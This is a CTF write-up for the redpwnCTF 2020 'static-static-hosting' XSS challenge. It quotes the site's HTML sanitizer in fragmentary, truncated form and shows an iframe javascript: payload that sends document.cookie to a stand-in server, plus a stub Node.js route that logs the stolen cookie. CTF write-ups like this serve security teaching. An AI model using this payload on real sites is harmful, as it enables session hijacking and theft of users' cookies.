Tags: web 


# static-static-hosting

Author: [roerohan](https://github.com/roerohan)

This is another XSS challenge, similar to [this](../static-pastebin) one.

# Requirements

- Basic knowledge of XSS.
- Server with SSL to accept a request.

# Source

- https://static-static-hosting.2020.redpwnc.tf/

# Exploitation

This site allows you to write HTML, so it's basically shouting at you to perform an XSS attack. Similar to [static-pastebin](../static-pastebin), the URL of the webpage created actually consists a base64 encoded form of the content of the page. We can see the `js` in the source.

(async () => {
await new Promise((resolve) => {
window.addEventListener('load', resolve);

const content = window.location.hash.substring(1);

function display(input) {
document.documentElement.innerHTML = clean(input);

function clean(input) {
const template = document.createElement('template');
const html = document.createElement('html');
html.innerHTML = input;


const result = html.innerHTML;
return result;

function sanitize(element) {
const attributes = element.getAttributeNames();
for (let i = 0; i < attributes.length; i++) {
// Let people add images and styles
if (!['src', 'width', 'height', 'alt', 'class'].includes(attributes[i])) {

const children = element.children;
for (let i = 0; i < children.length; i++) {
if (children[i].nodeName === 'SCRIPT') {
i --;
} else {

The main thing we notice is that it prevents `script` tags and it allows only the following attributes for an element: `'src', 'width', 'height', 'alt', 'class'`. So we have to perform an XSS with these attributes. So, here's the payload.

<iframe src="javascript:document.location='https://myserver.tld?cookie='+document.cookie"></iframe>

Note that here, the site is supposed to be `https`, otherwise there will be a Content Security Policy Bypass (CSP Bypass) error, and the request won't be sent. We can get the URL of the resulting webpage:


On the server, we can create a simple Node.js backend which accepts the cookie as a query param and logs it.

router.get('/cookie', (req, res) => {

When the link for the website is sent to the `admin bot`, which is basically a headless chrome browser, it visits the page and it's cookie is stolen and sent to the server at `myserver.tld`. The cookie stores the `flag`.

The flag is:


Original writeup (https://github.com/csivitu/CTF-Write-ups/tree/master/redpwnCTF%202020/web/static-static-hosting).